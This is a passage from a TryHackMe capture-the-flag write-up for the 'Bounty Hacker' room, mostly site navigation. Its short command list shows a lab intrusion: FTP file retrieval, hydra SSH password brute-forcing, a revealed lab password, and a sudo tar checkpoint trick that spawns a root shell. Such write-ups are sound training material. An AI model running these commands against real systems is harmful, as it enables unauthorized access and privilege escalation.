TryHackMe Writeups

Cowboyhacker

TryHackMe Writeups

GitHub

Home
Crackthehash
Cyberadventtemplate
Template
25daysofchristmas
25daysofchristmas
- 25daysofchristmas
AIforcyber aoc2025 y9wWQ1zRgB
AIforcyber aoc2025 y9wWQ1zRgB
- AIforcyber aoc2025 y9wWQ1zRgB
HackfinityBattle
HackfinityBattle
- HackfinityBattle
ICS modbus aoc2025 g3m6n9b1v4
ICS modbus aoc2025 g3m6n9b1v4
- ICS modbus aoc2025 g3m6n9b1v4
Adenumeration
Adenumeration
- Adenumeration
Adv3nt0fdbopsjcap
Adv3nt0fdbopsjcap
- Adv3nt0fdbopsjcap
Adventofcyber2
Adventofcyber2
- Adventofcyber2
Adventofcyber2023
Adventofcyber2023
- Adventofcyber2023
Adventofcyber2024
Adventofcyber2024
- WIP adventofcyber2024
- Adventofcyber2024
Adventofcyber23sidequest
Adventofcyber23sidequest
- Adventofcyber23sidequest
Adventofcyber24sidequest
Adventofcyber24sidequest
- Adventofcyber24sidequest
Adventofcyber25
Adventofcyber25
- Adventofcyber25
Adventofcyber25sidequest
Adventofcyber25sidequest
- Adventofcyber25sidequest
Agentsudoctf
Agentsudoctf
- Agentsudoctf
Anonymous
Anonymous
- Anonymous
Attacks on ecrypted files aoc2025 asdfghj123
Attacks on ecrypted files aoc2025 asdfghj123
- Attacks on ecrypted files aoc2025 asdfghj123
Auditingandmonitoringse
Auditingandmonitoringse
- Auditingandmonitoringse
Authenticationbypass
Authenticationbypass
- Authenticationbypass
Azuresentinel aoc2025 a7d3h9k0p2
Azuresentinel aoc2025 a7d3h9k0p2
- Azuresentinel aoc2025 a7d3h9k0p2
Blaster
Blaster
- Blaster
Blue
Blue
- Blue
Bof1
Bof1
- Bof1
Breachingad
Breachingad
- Breachingad
Breakrsa
Breakrsa
- Breakrsa
Burpsuitebasics
Burpsuitebasics
- Burpsuitebasics
Burpsuiteintruder
Burpsuiteintruder
- Burpsuiteintruder
Burpsuiteom
Burpsuiteom
- Burpsuiteom
Burpsuiterepeater
Burpsuiterepeater
- Burpsuiterepeater
Cloudenum aoc2025 y4u7i0o3p6
Cloudenum aoc2025 y4u7i0o3p6
- Cloudenum aoc2025 y4u7i0o3p6
Codeanalysis
Codeanalysis
- Codeanalysis
Commonlinuxprivesc
Commonlinuxprivesc
- Commonlinuxprivesc
Container security aoc2025 z0x3v6n9m2
Container security aoc2025 z0x3v6n9m2
- Container security aoc2025 z0x3v6n9m2
Contentdiscovery
Contentdiscovery
- Contentdiscovery
Cowboyhacker
Cowboyhacker
- Cowboyhacker Cowboyhacker
  Table of contents
  - Living up to the title.
Crackthehash
Crackthehash
- Crackthehash
Cryptographyintro
Cryptographyintro
- Cryptographyintro
Cybergovernanceregulation
Cybergovernanceregulation
- Cybergovernanceregulation
Dastzap
Dastzap
- Dastzap
Dataxexfilt
Dataxexfilt
- Dataxexfilt
Detecting c2 with rita aoc2025 m9n2b5v8c1
Detecting c2 with rita aoc2025 m9n2b5v8c1
- Detecting c2 with rita aoc2025 m9n2b5v8c1
Easyctf
Easyctf
- Easyctf
Encoding decoding aoc2025 s1a4z7x0c3
Encoding decoding aoc2025 s1a4z7x0c3
- Encoding decoding aoc2025 s1a4z7x0c3
Encryptioncrypto101
Encryptioncrypto101
- Encryptioncrypto101
Enumerationpe
Enumerationpe
- Enumerationpe
Exploitingad
Exploitingad
- Exploitingad
Fileinc
Fileinc
- Fileinc
First shift ctf
First shift ctf
- First shift ctf
Htapowershell aoc2025 p2l5k8j1h4
Htapowershell aoc2025 p2l5k8j1h4
- Htapowershell aoc2025 p2l5k8j1h4
Hydra
Hydra
- Hydra
Ice
Ice
- Ice
idor aoc2025 zl6MywQid9
idor aoc2025 zl6MywQid9
- idor aoc2025 zl6MywQid9
Intronetworksecurity
Intronetworksecurity
- Intronetworksecurity
Johntheripper0
Johntheripper0
- Johntheripper0
Kenobi
Kenobi
- Kenobi
Lateralmovementandpivoting
Lateralmovementandpivoting
- Lateralmovementandpivoting
Linprivesc
Linprivesc
- Linprivesc
Linuxcli aoc2025 o1fpqkvxti
Linuxcli aoc2025 o1fpqkvxti
- Linuxcli aoc2025 o1fpqkvxti
Linuxfundamentalspart1
Linuxfundamentalspart1
- Linuxfundamentalspart1
Linuxfundamentalspart2
Linuxfundamentalspart2
- Linuxfundamentalspart2
Linuxfundamentalspart3
Linuxfundamentalspart3
- Linuxfundamentalspart3
Linuxprivesc
Linuxprivesc
- Linuxprivesc
Linuxsystemhardening
Linuxsystemhardening
- Linuxsystemhardening
Malmalintroductory
Malmalintroductory
- Malmalintroductory
malware sandbox aoc2025 SD1zn4fZQt
malware sandbox aoc2025 SD1zn4fZQt
- malware sandbox aoc2025 SD1zn4fZQt
Metasploitexploitation
Metasploitexploitation
- Metasploitexploitation
Meterpreter
Meterpreter
- Meterpreter
Netsecchallenge
Netsecchallenge
- Netsecchallenge
Networkservices aoc2025 jnsoqbxgky
Networkservices aoc2025 jnsoqbxgky
- Networkservices aoc2025 jnsoqbxgky
Obfuscation aoc2025 e5r8t2y6u9
Obfuscation aoc2025 e5r8t2y6u9
- Obfuscation aoc2025 e5r8t2y6u9
Ohsint
Ohsint
- Ohsint
Operatingsystemsecurity
Operatingsystemsecurity
- Operatingsystemsecurity
Owaspjuiceshop
Owaspjuiceshop
- Owaspjuiceshop
Owasptop102021
Owasptop102021
- Owasptop102021
Passwordattacks
Passwordattacks
- Passwordattacks
Persistingad
Persistingad
- Persistingad
phishing aoc2025 h2tkye9fzU
phishing aoc2025 h2tkye9fzU
- phishing aoc2025 h2tkye9fzU
Picklerick
Picklerick
- Picklerick
Postexploit
Postexploit
- Postexploit
Powershell
Powershell
- Powershell
Printerhacking101
Printerhacking101
- Printerhacking101
promptinjection aoc2025 sxUMnCkvLO
promptinjection aoc2025 sxUMnCkvLO
- promptinjection aoc2025 sxUMnCkvLO
Race conditions aoc2025 d7f0g3h6j9
Race conditions aoc2025 d7f0g3h6j9
- Race conditions aoc2025 d7f0g3h6j9
Redteamrecon
Redteamrecon
- Redteamrecon
Registry forensics aoc2025 h6k9j2l5p8
Registry forensics aoc2025 h6k9j2l5p8
- Registry forensics aoc2025 h6k9j2l5p8
Rpnessusredux
Rpnessusredux
- Rpnessusredux
Rrootme
Rrootme
- Rrootme
Sast
Sast
- Sast
Seriskmanagement
Seriskmanagement
- Seriskmanagement
Shodan
Shodan
- Shodan
Splunkforloganalysis aoc2025 x8fj2k4rqp
Splunkforloganalysis aoc2025 x8fj2k4rqp
- Splunkforloganalysis aoc2025 x8fj2k4rqp
Spottingphishing aoc2025 r2g4f6s8l0
Spottingphishing aoc2025 r2g4f6s8l0
- Spottingphishing aoc2025 r2g4f6s8l0
Sql injection
Sql injection
- Sql injection
Steelmountain
Steelmountain
- Steelmountain
Thelayoftheland
Thelayoftheland
- Thelayoftheland
Threatmodelling
Threatmodelling
- Threatmodelling
Traverse
Traverse
- Traverse
Uploadvulns
Uploadvulns
- Uploadvulns
Vulnerabilitycapstone
Vulnerabilitycapstone
- Vulnerabilitycapstone
Vulnerabilitymanagementkj
Vulnerabilitymanagementkj
- Vulnerabilitymanagementkj
Vulnversity
Vulnversity
- Vulnversity
Walkinganapplication
Walkinganapplication
- Walkinganapplication
Weaponization
Weaponization
- Weaponization
Webattackforensics aoc2025 b4t7c1d5f8
Webattackforensics aoc2025 b4t7c1d5f8
- Webattackforensics aoc2025 b4t7c1d5f8
Webhackingusingcurl aoc2025 w8q1a4s7d0
Webhackingusingcurl aoc2025 w8q1a4s7d0
- Webhackingusingcurl aoc2025 w8q1a4s7d0
Winadbasics
Winadbasics
- Winadbasics
Windows10privesc
Windows10privesc
- Windows10privesc
Windowsfundamentals1
Windowsfundamentals1
- Windowsfundamentals
Windowsfundamentals2
Windowsfundamentals2
- Windowsfundamentals2
Windowsfundamentals3
Windowsfundamentals3
- Windowsfundamentals3
Windowslocalpersistence
Windowslocalpersistence
- Windowslocalpersistence
Windowsprivesc20
Windowsprivesc20
- Windowsprivesc20
Wiresharkpacketoperations
Wiresharkpacketoperations
- Wiresharkpacketoperations
Wiresharkthebasics
Wiresharkthebasics
- Wiresharkthebasics
Wonderland
Wonderland
- Wonderland
Xss aoc2025 c5j8b1m4t6
Xss aoc2025 c5j8b1m4t6
- Xss aoc2025 c5j8b1m4t6
Yara aoc2025 q9w1e3y5u7
Yara aoc2025 q9w1e3y5u7
- Yara aoc2025 q9w1e3y5u7

Bounty Hacker

Bounty Hacker Logo

Bounty Hacker

This guide contains the answer and steps necessary to get to them for the Bounty Hacker room.

Living up to the title.

Commands:

nmap -sV 10.10.216.171 ftp 10.10.216.171 get task.txt cat task.txt get locks.txt cat locks.txt hydra -l user -P locks.txt ssh://10.10.216.171:22 -t 4
hydra -l lin -P locks.txt ssh://10.10.216.171:22 -t 4 ssh lin@10.10.216.171 cat user.txt susudo

RedDr4gonSynd1cat3

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh tar: Removing leading `/' from member names

Who wrote the task list?

Click for answer

What service can you bruteforce with the text file found?

Click for answer

What is the users password?

Click for answer

user.txt

Click for answer

root.txt

Click for answer